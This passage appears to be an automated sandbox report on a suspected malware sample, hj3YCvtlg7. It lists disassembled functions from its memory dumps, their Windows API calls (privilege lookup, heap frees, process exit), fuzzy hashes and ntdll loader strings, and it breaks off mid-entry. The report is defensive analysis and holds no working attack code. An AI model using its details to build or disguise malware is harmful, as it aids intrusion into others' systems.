API String ID: 1836367815-0
Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7C2 Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c2bf0afcd6b210e6050da096542cf81bb09f150e42e767c5e43b5e2650d02e06
Instruction ID: 6b2e5c613ef55a6df0f55c5fb8cdc32da47c137495a01ec00b15de7221719f23
Opcode Fuzzy Hash: c2bf0afcd6b210e6050da096542cf81bb09f150e42e767c5e43b5e2650d02e06
Instruction Fuzzy Hash: 73F0EDB5201259AFCB10DF48CC84FD7BBA8EF88654F108198FE0C5B242CA30A851CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A66A Relevance: 1.5, APIs: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0f6725eb35f52b3fdc17333689a778d032c8229e468558adea3ffab8edd294ea
Instruction ID: 7843ae0af5eb49ce608649b451d0fbbf040d2ecdec55f49cadfe4ccedadb182e
Opcode Fuzzy Hash: 0f6725eb35f52b3fdc17333689a778d032c8229e468558adea3ffab8edd294ea
Instruction Fuzzy Hash: C3E04FB52002046FD714DF59CC84EEB37AAEF88354F158559FA1C97252C631E911CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6A2 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: bdf861d4c4c428965906b4d703dc43911d27af3f5feaa706c1122f1b340ec4e5
Instruction ID: 004607ab2a9e9a6b3538d07686916e66172f62f4b7a9503426b8375871ffdb93
Opcode Fuzzy Hash: bdf861d4c4c428965906b4d703dc43911d27af3f5feaa706c1122f1b340ec4e5
Instruction Fuzzy Hash: 76E08671645244BBD720DB58CC84ED33F66DF59250F19C15AB94EAB751C930D901C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8

Memory Dump Source

Source File: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_hj3YCvtlg7.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 01762C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01762C24

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
Instruction ID: 5fb6751b7ade4547c1a463c2ba43b53395e6f5b85dd39afc6bceeb6f3afdd017
Opcode Fuzzy Hash: f047e2743a81a55474f904c50166ff3456fee598ec76de90ea3facf75c6a067b
Instruction Fuzzy Hash: 86B09B719055C5C9DF52F764460C717B90477D0701F16C071D6030651F4738C1D1E276

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 017A2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

TracingFlags, xrefs: 017A2549
CFGOptions, xrefs: 017A2967
@, xrefs: 017A2942
GlobalFlag2, xrefs: 017A2FC0
DisableExceptionChainValidation, xrefs: 017A275F
MinimumStackCommitInBytes, xrefs: 017A2BB0
minkernel\ntdll\ldrinit.c, xrefs: 017A3187
UnloadEventTraceDepth, xrefs: 017A24C0
UseImpersonatedDeviceMap, xrefs: 017A251C
FrontEndHeapDebugOptions, xrefs: 017A2489
Initializing the application verifier package failed with status 0x%08lx, xrefs: 017A3176
MaxDeadActivationContexts, xrefs: 017A2D82
LdrpInitializeExecutionOptions, xrefs: 017A317D
ShutdownFlags, xrefs: 017A24A1
@, xrefs: 017A2B74
MaxLoaderThreads, xrefs: 017A24EC
ExecuteOptions, xrefs: 017A25A0
GlobalFlag, xrefs: 017A2F3F, 017A3059
DisableHeapLookaside, xrefs: 017A246D
RaiseExceptionOnPossibleDeadlock, xrefs: 017A2579

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
Instruction ID: b05875a2a1c3661bfa0dce776f2dfb8ca35786420657c314be24f075a91f212e
Opcode Fuzzy Hash: 8fe6c26c4ef9606fa69702e7f462ca7b353f04abcab65f2c125a845cd26a72b4
Instruction Fuzzy Hash: 4A926C71608342AFE721DF28C884B6BF7E8BB84754F444A2DFA94D7252D770E944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01758620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Thread identifier, xrefs: 0179553A
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954CE
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0179540A, 01795496, 01795519
corrupted critical section, xrefs: 017954C2
Address of the debug info found in the active list., xrefs: 017954AE, 017954FA
Critical section address, xrefs: 01795425, 017954BC, 01795534
Critical section address., xrefs: 01795502
Thread is in a state in which it cannot own a critical section, xrefs: 01795543
undeleted critical section in freed memory, xrefs: 0179542B
Invalid debug info address of this critical section, xrefs: 017954B6
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017954E2
double initialized or corrupted critical section, xrefs: 01795508
Critical section debug info address, xrefs: 0179541F, 0179552E
8, xrefs: 017952E3

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
Instruction ID: 059fa58a12d8bf5706f9680aeb64cb80ed48328f530afd5896dd40283c1ae5c8
Opcode Fuzzy Hash: 82bf5b950202e646c90747a88940045a49bfb3b9c8e36785cd192feaba66c56c
Instruction Fuzzy Hash: 00819DB1A00358EFEF21CF99C855BAEFBF5AB48704F20415AF904B7291D3B1A944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 017529F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01792409
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01792412
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017925EB
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017922E4
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017924C0
@, xrefs: 0179259B
RtlpResolveAssemblyStorageMapEntry, xrefs: 0179261F
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01792498
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01792624
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01792602
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01792506

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
Instruction ID: 0a73871d438f389c10f4cfa477aae95a6dade5123237f3d52e2e0798a1bf7c0e
Opcode Fuzzy Hash: 1847a3f72c42a50c4b34d576a121c6d30ad8c96388d17de302894081c279d27c
Instruction Fuzzy Hash: 950271F1D042299BDF61DB54CC84BD9F7B8AB54304F4041DAEA49A7243EB70AE84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 017C8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

lsass.exe, xrefs: 017C8BA1
runtimebroker.exe, xrefs: 017C8B73
DefaultBrowser_NOPUBLISHERID, xrefs: 017C8D00
SegmentHeap, xrefs: 017C8BE9
heapType, xrefs: 017C8BCB
services.exe, xrefs: 017C8B96
smss.exe, xrefs: 017C8B8B
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 017C8BD0
svchost.exe, xrefs: 017C8B68
csrss.exe, xrefs: 017C8B80

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
Instruction ID: 424885e97c3c6c5f589febec666c91ea01141018966b81f570c3032aa60b7966
Opcode Fuzzy Hash: 0255006c204b60f049dd1fe94d120493c52d1bc93651e73009743e5789e1350f
Instruction Fuzzy Hash: 9A51BD715143119BD339CF288844BABFBECEF98B50F14496DEA9AC3245E770D644CB92

Uniqueness

Uniqueness Score: -1.00%

Function 017D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to reallocate block at %p to %Ix bytes, xrefs: 017D03BA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 017D04D3
HEAP: , xrefs: 017D03A6, 017D04B5, 017D05DD, 017D0682, 017D06D9
RtlReAllocateHeap, xrefs: 017D02BF, 017D0362
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 017D06EA
HEAP[%wZ]: , xrefs: 017D0399, 017D04A8, 017D05D0, 017D0675, 017D06CC
Just reallocated block at %p to %Ix bytes, xrefs: 017D05F1
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 017D069F

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
Instruction ID: cd869c5d9dd4107611c4cd77b53a878a05802e1bcba8382563e1e070b6d1ba20
Opcode Fuzzy Hash: 13e2a0fd41de6a258305842781a817fd8cfe220d7a48521c181d8e8b14f0f0a6
Instruction Fuzzy Hash: 7BD1CA3560068ADFDB22DFACC444AAEFBF2FF4A710F189059F9469B256C7349981CB10

Uniqueness

Uniqueness Score: -1.00%

Function 017A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017A8A3D
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017A8A67
VerifierFlags, xrefs: 017A8C50
VerifierDebug, xrefs: 017A8CA5
AVRF: -*- final list of providers -*- , xrefs: 017A8B8F
VerifierDlls, xrefs: 017A8CBD
HandleTraces, xrefs: 017A8C8F

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
Instruction ID: 54ca0973da4dbd26530540bdd30b5d7449d9a542f89f09b45a5b7129c684307f
Opcode Fuzzy Hash: ff251fda238ea604ba7a93f008e79c40e2a70988d0d35125b213dcf754c16b75
Instruction Fuzzy Hash: 25915873641302EFD721EF68C894B5BF7E8ABD9B15F840658FA41AB244C7709E40CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0172EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

{, xrefs: 01784643
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0172EB6C
, xrefs: 0172F299
T, xrefs: 0172EB4E
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0172EB58
R, xrefs: 0172EB62

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
Instruction ID: db8752f54228dfca73b19b8220056b64f476c517fa7074d6b3c659b162ce584f
Opcode Fuzzy Hash: 5c30c818792b354b2d10fcc43edb6c18a37993286a25eb4b201979290cd5506e
Instruction Fuzzy Hash: 41A22974A0562A8FDB64DF18CC987A9FBB5AF45304F2442E9D90EA7254DB709EC1CF40

Uniqueness

Uniqueness Score: -1.00%

Function 017563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

_LdrpInitialize, xrefs: 017940DF, 01794141, 01794205, 0179425F
minkernel\ntdll\ldrinit.c, xrefs: 017940E9, 0179414B, 0179420F, 01794269
Process initialization failed with status 0x%08lx, xrefs: 0179413A
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 017940D8
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 017941FE
Delaying execution failed with status 0x%08lx, xrefs: 01794258

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
Instruction ID: 0c3004847f5ce77fa99c7647d61851295e718d9af79cd1004b30111cf45f3676
Opcode Fuzzy Hash: 06776754f938e88a5b7c5338a4f0c3c34f2fdffa24149eb3b3177e320f1d85c1
Instruction Fuzzy Hash: F2916C72B403169BDF35DF58E948BAAFBA5FB41B24F500168FE0167289D7B05A42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0171645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01716496
minkernel\ntdll\ldrinit.c, xrefs: 01779A11, 01779A3A
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01779A01
LdrpInitShimEngine, xrefs: 017799F4, 01779A07, 01779A30
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017799ED
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01779A2A

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
Instruction ID: a54c2a807c0ad568638060b8763c4b4af067afce1b187b9850018621e5a01c14
Opcode Fuzzy Hash: 7b205d0ab8cf3f2d5f8bfcaead2ea71f9cec4d6e367157161515a76e577005e3
Instruction Fuzzy Hash: 66510572209301DFDB21EF28C845BABF7E8FB84658F10091DFA8597165DB70EA44CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01752674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0179219F
RtlGetAssemblyStorageRoot, xrefs: 01792160, 0179219A, 017921BA
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01792178
SXS: %s() passed the empty activation context, xrefs: 01792165
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017921BF
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01792180

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
Instruction ID: a7bde55655de706103a5b837f173892afdf5502bd6b97fe86b492da32719a91f
Opcode Fuzzy Hash: 9ecceaba6c5e232276472825c3a65bf0ee1f54b14092e07381693bced36361c1
Instruction Fuzzy Hash: 8F3139B6B80315F7EB21DA999C85F5FFAB8DB65A40F050059FB0467286D3B0AE00C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 0175C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 0175C6C4
Unable to build import redirection Table, Status = 0x%x, xrefs: 017981E5
Loading import redirection DLL: '%wZ', xrefs: 01798170
minkernel\ntdll\ldrinit.c, xrefs: 0175C6C3
LdrpInitializeImportRedirection, xrefs: 01798177, 017981EB
minkernel\ntdll\ldrredirect.c, xrefs: 01798181, 017981F5

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
Instruction ID: 50efeb5e8ee26ef1f24b5f1832fc7f1c6d9860322028828615439413e4f0ac64
Opcode Fuzzy Hash: deb0c57285df5c39743b3656aaadc09519d67a47dd26328f0626edf99e3e34c2
Instruction Fuzzy Hash: C531E4B26443069FD321EF28DC49E2AF7D8EF95B10F04055CF941AB299D660ED04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0176096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01762DF0: LdrInitializeThunk.NTDLL ref: 01762DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01760D74

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
Instruction ID: 298e506122e2ef465eef6cce5443ef1fa643323b92a149b412061e71f0bca7f6
Opcode Fuzzy Hash: 83f1c30214d5ae07c48dcebb8d15807debf62bf1f1e8dca116419813b44b7b2f
Instruction Fuzzy Hash: 6B425D71900715DFDB61CF28C884BAAB7F9FF48314F1445AAE989DB245E770AA84CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0172A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 0172A3EF
LdrResFallbackLangList Exit, xrefs: 0172A3FF
6, xrefs: 0172A3F7
8, xrefs: 0172A3E7

Memory Dump Source

Source File: 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_16f0000_hj3YCvtlg7.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
Instruction ID: e1442fb5502c17571284663e9498bc16824eb895af2569cec115048c909ad4cc
Opcode Fuzzy Hash: 548e7bfd93300458b1a1686b66c0c13907bbdd383b79834c16e9a1ebfa9a1550
